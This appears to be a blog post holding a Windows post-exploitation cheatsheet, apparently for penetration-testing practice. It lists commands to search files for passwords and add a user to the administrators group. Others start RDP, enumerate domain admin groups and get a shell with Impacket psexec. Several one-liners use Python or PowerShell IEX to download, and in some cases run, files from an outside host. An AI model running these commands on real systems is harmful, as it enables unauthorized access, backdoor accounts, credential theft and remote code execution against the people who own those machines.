Windows-cheatsheet



systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

findstr /s /n /i /p /c:"password" *.txt


===================================================================
Using NET
net user /add [username] [password]

net localgroup administrators [username] /add

net start TermService ( start RDP Service)

netsh firewall show state

net group "Domain Admins"
net group "Enterprise Admins"


===================================================================
Use Python like wget
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'w') ; localFile.write(u.read()); localFile.close()"

===================================================================
Getting Shells as a user details

WMI


SMB

Impacket
/usr/share/doc/python-impacket/examples/psexec.py DOMAIN/USER@IP cmd.exe


===================================================================
Transferring files

Powershell

powershell 'IEX(New-Object Net.WebClient).downloadFile('http://whatever.com/file.exe', 'file.exe')'

OR

powershell 'IEX(New-Object Net.WebClient).downloadString('http://whatever.com:1234/file.exe', 'file.exe')'

OR

powershell 'IEX(New-Object Net.WebClient).downloadString("http://whatever.com:1234/file.exe")'


OR

powershell IWR -Uri http://whatever.com/file.exe -OutFile file.exe

==================================================================

No comments:

Post a Comment